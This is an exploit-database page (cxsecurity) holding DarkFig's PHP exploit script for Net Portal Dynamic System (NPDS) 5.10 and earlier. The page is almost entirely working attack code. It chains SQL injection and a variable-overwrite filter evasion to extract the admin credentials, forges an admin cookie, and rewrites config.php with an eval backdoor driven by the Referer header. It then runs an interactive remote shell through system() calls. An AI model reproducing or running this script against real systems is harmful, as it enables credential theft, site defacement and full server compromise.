Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day

2007.03.26
Credit: DarkFig
Risk: High
Local: No
Remote: Yes
CWE: N/A

#!/usr/bin/php <?php /** * This file require the PhpSploit class. * If you want to use this class, the latest * version can be downloaded from acid-root.new.fr. **/ require("phpsploitclass.php"); error_reporting(E_ALL ^ E_NOTICE); # Advisory soon if($argc < 3) { print(" TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day AUTHOR | DarkFig / http://www.acid-root.new.fr / gmdarkfig (at) gmail (dot) com [email concealed] NOTE | Works regardless of php settings USAGE | $argv[0] -url <url> [Options] OPTIONS | -proxy If you wanna use a proxy <proxyhost:proxyport> | -proxyauth Basic authentification <proxyuser:proxypwd> ");exit(1); } $url = getparam('url',1); $pro = getparam('proxy'); $pra = getparam('proyauth'); $xpl = new phpsploit(); $xpl->agent('Mozilla Firefox'); if($pro) $xpl->proxy($pro); if($pra) $xpl->proxyauth($pra); # +print.php (SQL INJECTION) # | # 124. } elseif (!empty($lid)) { # 125. settype ($lid, "integer"); # 126. PrintPage("links",$DB, $lid); # # 30. if ($oper=="links") { # 31. $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'"); # 32. list($url, $title, $description, $time)=mysql_fetch_row($result); # 40. if ($DB) { # 41. $remp=meta_lang(aff_code(aff_langue(ob_get_contents()))); # $aid = 'CONCAT(CHAR(66,69,71,73,78,85,83,82),(SELECT%20aid%20FROM%20authors%20W HERE%20radminsuper=1),CHAR(69,78,68,85,83,82))'; $pwd = 'CONCAT(CHAR(66,69,71,73,78,80,87,68),(SELECT%20pwd%20FROM%20authors%20W HERE%20radminsuper=1),CHAR(69,78,68,80,87,68))'; # +grab_globals.php (VARS OVERWRITE / "url_protect" FILTER EVASION) # | # 78. if (!empty($_GET)) { # 79. if (!$magicquotesGPC) # 80. array_walk($_GET,'addslashes_GPC'); # 81. reset($_GET); # 82. array_walk($_GET,'url_protect'); # 83. extract($_GET, EXTR_OVERWRITE); # # 106. if (!empty($_COOKIE)) { # 107. if (!$magicquotesGPC) # 108. array_walk($_COOKIE,'addslashes_GPC'); # 109. reset($_COOKIE); # 110. array_walk($_COOKIE,'url_protect'); # 111. extract($_COOKIE, EXTR_OVERWRITE); # # 132. if (!empty($_FILES)) { # 133. while (list($key,$value)=each($_FILES)) { # 134. $$key=$value['tmp_name']; # 135. } # $xpl->get($url."print.php?_FILES[DB][tmp_name]=links_links%20union%20sel ect%20-1,$aid,$pwd,1%20ORDER%20BY%20url%23&lid=1"); if (preg_match("#BEGINUSR(.*)ENDUSR#",$xpl->getcontent(),$aid) AND preg_match("#BEGINPWD(.*)ENDPWD#",$xpl->getcontent(),$pwd)) print "nAdmin_aid: $aid[1]nAdmin_pwd: $pwd[1]"; else die("Exploit failed"); # +auth.inc.php (ADMIN AUTH) # | # 59. if ($admin!="") { # 60. $Xadmin = base64_decode($admin); # 61. $Xadmin = explode(":", $Xadmin); # 62. $aid = urlencode($Xadmin[0]); # 63. $AIpwd = $Xadmin[1]; # 64. if ($aid=="" or $AIpwd=="") { # 65. Admin_Alert("Null Aid or Passwd"); # 66. } # 67. $result=mysql_query("select pwd, radminsuper from authors where aid='$aid'"); # 68. if (!$result) { # 69. Admin_Alert("DB not ready #2 : $aid / $AIpwd | "); # 70. } else { # 71. list($AIpass, $Xsuper_admintest)=mysql_fetch_row($result); # 72. if (md5($AIpass) == $AIpwd and $AIpass != "") { # 73. $admintest = true; # 74. $super_admintest = $Xsuper_admintest; # 75. } else { # 76. Admin_Alert("Password in Cookies not Good #1 : $aid / $AIpwd | "); # 77. } # 78. } # 79. unset ($AIpass); # 80. unset ($AIpwd); # 81. unset ($Xadmin); # 82. unset ($Xsuper_admintest); # 83. } # $cok = urlencode(base64_encode($aid[1].':'.md5($pwd[1]))); $xpl->addcookie('admin',$cok); print "nAdmin_cookie: admin=$cokn$shell> "; # +admin/settings.php (CODE EXECUTION) # | # 758. switch($op) { # 763. case "ConfigSave": # 764. include("admin/settings_save.php"); # 765. ConfigSave($xparse,$xsitename,$xnuke_url,$xsite_logo,$xslogan,$xstartdat e,$xadminmail, # $xtop,$xstoryhome,$xoldnum,$xultramode,$xanonpost,$xDefault_Theme,$xbann ers,$xmyIP, # $xfoot1,$xfoot2,$xfoot3,$xfoot4,$xbackend_title,$xbackend_language,$xbac kend_image, # $xbackend_width,$xbackend_height,$xlanguage,$xlocale,$xperpage,$xpopular ,$xnewlinks, # $xtoplinks,$xlinksresults,$xlinks_anonaddlinklock,$xnotify,$xnotify_emai l,$xnotify_subject, # $xnotify_message,$xnotify_from,$xmoderate,$xcommentlimit,$xanonymous,$xm axOptions,$xBarScale, # $xsetCookies,$xtipath,$xuserimg,$xadminimg,$xadmingraphic,$xsite_font,$x admart,$xminpass, # $xhttpref,$xhttprefmax,$xpollcomm,$xlinkmainlogo,$xstart_page,$xsmilies, $xOnCatNewLink, # $xEmailFooter,$xshort_user,$xgzhandler,$xrss_host_verif,$xcache_verif,$x member_list, # $xdownload_cat,$xmod_admin_news,$xgmt,$xAutoRegUser,$xTitlesitename,$xfi lemanager, # $xshort_review,$xnot_admin_count,$xadmin_cook_duration,$xuser_cook_durat ion,$xtroll_limit, # $xsubscribe,$xCloseRegUser,$xshort_menu_admin,$xmail_fonction,$xmemberpa ss,$xshow_user, # $xdns_verif,$xmember_invisible,$xavatar_size,$xlever,$xcoucher,$xmulti_l angue,$xadmf_ext, # $xsavemysql_size,$xsavemysql_mode,$xtiny_mce); # 766. break; # 767. } # # +admin/settings_save.php # | # 142. function ConfigSave(... # 212. $file = fopen("config.php","w"); # 401. $content .= "$perpage = $xperpage;n"; # 402. $content .= "$popular = $xpopular;n";... # 614. fwrite($file, $content); # 615. fclose($file); # $PHPCODE = 'if(isset($_SERVER[HTTP_REFERER])) eval($_SERVER[HTTP_REFERER])'; # Default config value # You can get the config here ./admin.php?op=Configure # $config = array( frmdt_url => $url.'admin.php',"xparse" => "1","xgzhandler" => "0","xfilemanager" => "0","xadmin_cook_duration" => "240", "xuser_cook_duration" => "8000","xsitename" => "NPDS SABLE","xTitlesitename" => "NPDS - gnrateur de portail Php / Mysql en Open Source", "xnuke_url" => "http://www.npds.org","xsite_logo" => "themes/Permanent-Double-Side/images/npds_p.gif","xslogan" => "NPDS SABLE", "xstartdate" => "01/10/2005","xtop" => "10;$PHPCODE","xstoryhome" => "10","xoldnum" => "10","xultramode" => "1","xanonymous" => "Anonyme", "xanonpost" => "0","xtroll_limit" => "6","xmod_admin_news" => "0","xnot_admin_count" => "1","xDefault_Theme" => "Permanent-Double-Side", "xstart_page" => "index.php?op=edito","xlanguage" => "french","xmulti_langue" => "false","xlocale" => "french","xlever" => "08:00", "xcoucher" => "20:00","xgmt" => "","xbanners" => "0","xmyIP" => "1.1.1.100","xfoot4" => "","xbackend_title" => "NPDS","xbackend_language" => "fr-FR", "xfoot1" => "Tous les Logos et Marques sont dposs, les commentaires sont sous la responsabilit de ceux qui les ont publis, le reste @ npds.org", "xfoot2" => "Ce site a t construit avec <a href=http://www.npds.org CLASS=NOIR>NPDS</a>, un syst&#232;me de portail crit en PHP. Ce logiciel est sous <a href=http://www.gnu.org CLASS=NOIR>GNU/GPL license</a>.", "xfoot3" => "syndication de vos News via <a href=http://www.votre_site/backend.php CLASS=NOIR>www.votre_site/backend.php</a> -::- + encore via le NPDS Push Infos System", "xbackend_image" => "","xbackend_width" => "88","xbackend_height" => "31","xperpage" => "10","xpopular" => "10","xnewlinks" => "10", "xtoplinks" => "10","xlinksresults" => "10","xlinks_anonaddlinklock" => "0","xlinkmainlogo" => "0","xOnCatNewLink" => "1", "xadminmail" => "","xmail_fonction" => "1","xEmailFooter" => "","xnotify" => "0","xnotify_email" => "membre (at) site (dot) fr [email concealed]","xnotify_subject" => "Nouvelle soumission", "xnotify_message" => "Le site a recu une nouvelle soumission !","xnotify_from" => "webmaster","xmoderate" => "1","xcommentlimit" => "4096", "xmaxOptions" => "12","xBarScale" => "1","xsetCookies" => "1","xpollcomm" => "1","xtipath" => "themes/Permanent-Double-Side/images/topics/", "xuserimg" => "/themes/Permanent-Double-Side/images/menu/","xadminimg" => "images/admin/","xadmingraphic" => "0","xadmf_ext" => "gif", "xshort_menu_admin" => "1","xsite_font" => "Verdana, Arial, Helvetica","xadmart" => "10","xminpass" => "5","xshow_user" => "20","xsmilies" => "1", "xavatar_size" => "60*80","xshort_user" => "0","xAutoRegUser" => "1","xmemberpass" => "1","xsubscribe" => "1","xmember_invisible" => "0", "xCloseRegUser" => "0","xhttpref" => "1","xhttprefmax" => "1000","xmember_list" => "0","xdownload_cat" => "Tous","xshort_review" => "0", "xrss_host_verif" => "false","xcache_verif" => "true","xdns_verif" => "false","xsavemysql_size" => "256","xsavemysql_mode" => "1", "xtiny_mce" => "true","op" => "ConfigSave"); # 0_o my website has been reset # $xpl->formdata($config); while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) # $cmd -> );print($dbpass);// { $xpl->addheader("Referer","@system($cmd);die;"); $xpl->get($url.'config.php'); print $xpl->getcontent()."n$shell> "; } function getparam($param,$opt='') { global $argv; foreach($argv as $value => $key) { if($key == '-'.$param) return $argv[$value+1]; } if($opt) exit("n-$param parameter required"); else return; } ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top